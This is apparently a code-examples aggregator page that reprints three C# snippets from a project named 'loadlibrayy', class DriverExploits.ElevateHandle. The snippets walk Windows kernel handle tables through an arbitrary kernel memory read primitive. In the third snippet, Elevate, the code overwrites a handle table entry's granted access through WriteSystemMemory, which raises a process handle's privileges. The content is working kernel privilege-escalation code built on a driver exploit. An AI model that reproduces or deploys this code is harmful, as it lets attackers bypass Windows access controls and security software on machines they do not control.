Here are the examples of the csharp api class DriverExploits.ElevateHandle.ReadSystemMemory(ulong) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
3 Examples
0
1. Example
Project: loadlibrayy
Source File: ElevateHandle.cs
Source File: ElevateHandle.cs
private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntryWin7(void* HandleTable, ulong Handle) { ulong v2; // r8@2 ulong v3; // rcx@2 ulong v4; // r8@2 ulong result; // rax@4 ulong v6; // [sp+8h] [bp+8h]@1 ulong table = (ulong)HandleTable; v6 = Handle; v6 = Handle & 0xFFFFFFFC; if (v6 >= *(uint*)(table + 92)) { result = 0; } else { v2 = (*(ulong*)table); v3 = (*(ulong*)table) & 3; v4 = v2 - (uint)v3; if ((uint)v3 > 0) { if ((uint)v3 == 1) result = ReadSystemMemory<ulong>((((Handle - (Handle & 0x3FF)) >> 7) + v4)) + 4 * (Handle & 0x3FF); else result = ReadSystemMemory<ulong>((ulong)(ReadSystemMemory<ulong>((ulong)(((((Handle - (Handle & 0x3FF)) >> 7) - (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF)) >> 9) + v4)) + (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF))) + 4 * (Handle & 0x3FF); } else { result = v4 + 4 * Handle; } } return (NT._HANDLE_TABLE_ENTRY*)result; }
0
2. Example
Project: loadlibrayy
Source File: ElevateHandle.cs
Source File: ElevateHandle.cs
private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntry(void* HandleTable, ulong Handle) { ulong v2; // rdx@1 long v3; // r8@2 ulong result; // rax@4 ulong v5; ulong a1 = (ulong)HandleTable; v2 = Handle & 0xFFFFFFFFFFFFFFFCu; if (v2 >= *(uint*)a1) { result = 0; } else { v3 = (long)*(ulong*)(a1 + 8); if ((*(ulong*)(a1 + 8) & 3) > 0) { if ((*(uint*)(a1 + 8) & 3) == 1) { v5 = ReadSystemMemory<ulong>((ulong)v3 + 8 * (v2 >> 10) - 1); result = v5 + 4 * (v2 & 0x3FF); } else { v5 = ReadSystemMemory<ulong>(ReadSystemMemory<ulong>((ulong)v3 + 8 * (v2 >> 19) - 2) + 8 * ((v2 >> 10) & 0x1FF)); result = v5 + 4 * (v2 & 0x3FF); } } else { result = (ulong)v3 + 4 * v2; } } return (NT._HANDLE_TABLE_ENTRY*)result; }
0
3. Example
Project: loadlibrayy
Source File: ElevateHandle.cs
Source File: ElevateHandle.cs
public static bool Elevate(ulong handle, dynamic desiredAccess) { var handleTableAddress = ReadSystemMemory<ulong>(g_Context.KernelEntry + g_OffsetObjectTable); var handleTable = ReadSystemMemory<_HANDLE_TABLE>(handleTableAddress); NT._HANDLE_TABLE_ENTRY* entryAddress = g_IsWindows7Machine ? ExpLookupHandleTableEntryWin7(&handleTable, handle) : ExpLookupHandleTableEntry(&handleTable, handle); if ((ulong)entryAddress == 0) throw new Exception("ExpLookupHandleTableEntry/7 failed"); var entry = ReadSystemMemory<NT._HANDLE_TABLE_ENTRY>((ulong)entryAddress); bool didElevate = WriteSystemMemory((ulong)entryAddress + sizeof(ulong), (ulong)desiredAccess); Log.LogInfo($"Elevating {handle.ToString("x2")} -> {desiredAccess.ToString("x2")} ? {didElevate}"); return didElevate; }